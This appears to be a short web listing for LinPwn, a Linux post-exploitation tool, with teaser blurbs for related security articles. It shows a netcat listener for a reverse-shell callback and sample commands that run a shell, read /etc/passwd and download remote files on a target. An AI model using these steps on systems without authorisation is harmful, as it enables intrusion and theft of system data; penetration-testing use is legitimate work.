LinPwn is a interactive tool created to assist you in post exploitation enumeration and privilege escalation.
Connection
nc -lvp PORT
on your machine and then run LinPwn on the target machine to get a connection.(LinPwn: Shell) > id
(LinPwn: ReadFile)> /etc/passwd
(LinPwn) > enumerate
(LinPwn: Download) > https://exampleurl.com/file_to_download
I included a file called build.sh this is optional run bash build.sh
to view the build options if you wish to use them.
Cybersecurity tools play a critical role in safeguarding digital assets, systems, and networks from malicious…
MODeflattener is a specialized tool designed to reverse OLLVM's control flow flattening obfuscation through static…
"My Awesome List" is a curated collection of tools, libraries, and resources spanning various domains…
CVE-2018-17463, a type confusion vulnerability in Chrome’s V8 JavaScript engine, allowed attackers to execute arbitrary…
The blog post "Chrome Browser Exploitation, Part 1: Introduction to V8 and JavaScript Internals" provides…
The exploitation of CVE-2018-17463, a type confusion vulnerability in Chrome’s V8 JavaScript engine, relies on…